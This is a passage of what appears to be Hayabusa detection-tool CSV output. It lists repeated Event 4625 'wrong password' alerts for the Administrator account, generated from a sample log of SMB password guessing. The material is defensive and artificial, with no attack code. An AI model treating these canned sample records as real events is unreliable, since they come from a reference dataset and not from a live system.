NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GVHzJHTi55NbxXYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1FROeEnMLna2fTTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pio6ZZ9pV0pS2Whi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h1aD2w5U5K9ND5HV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zF8Jb4GpG4D3xn9i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edv4GwGfL156V1xe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Irvneva9RFn44iII : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dHtJFI8OL9kJylL5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F5Q4h62T77hGjhKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdSALwo9td9xUeBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1kYfoqz1r1NuEn04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7X400gufqdunUa8j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lLR8z7g0GY8r7a1r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHMztrxiKBGtNqkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eBQevVhmZs5gHFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lyQCs0PG6fGzpidu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnsPjnCieyoFIbJZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ku6mjVaG1lCJrAo1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VwiyVIWHOGuHzhdO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92v1rXcj5c0Lt3OF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yO2JYd6FfM2Y7px9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ltr5g8ZWUAdrPKxg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fjiPMy5uOTbbmaQ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HDRVOzxca9wDJziV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DV28RjUK26Je2Dr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seoetT43w0S3FEss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IdIU9Q9Ig4Bd3Aps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGzuHSHT59Qnp5jI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPA1J7aQrZ064WSf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhLFXDMUKGfdoc4S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: apVAhc6o3dhLmUll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYMdQeB4ZpFm8xDh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QewW1ISqRdXwtSXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SFhBcgZfc9VZ5S8S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a4ZSRW7F65yDNbJd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HrbzGNYIbjErVtDR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eFcGaL3asLVIF08d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dhJvIM5PzA9U6GTD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYrfD15TPp8OuST4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8d4CbZSTHhl7fRfa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IItrtl1h3PsKviaQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVeoptuwLNKlm0V2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rf6Ri9Lm81mScRt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NPVkTRUILL5czcbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZJq3kjykwzh0hVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHL4KuirjQ96Dgfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSPjDklMHdW6LqK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EL0oMweyFgI0MEdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NJS2dZhWmCGF1Qos : IP Address: 192.168.198.149 : AuthPackage: 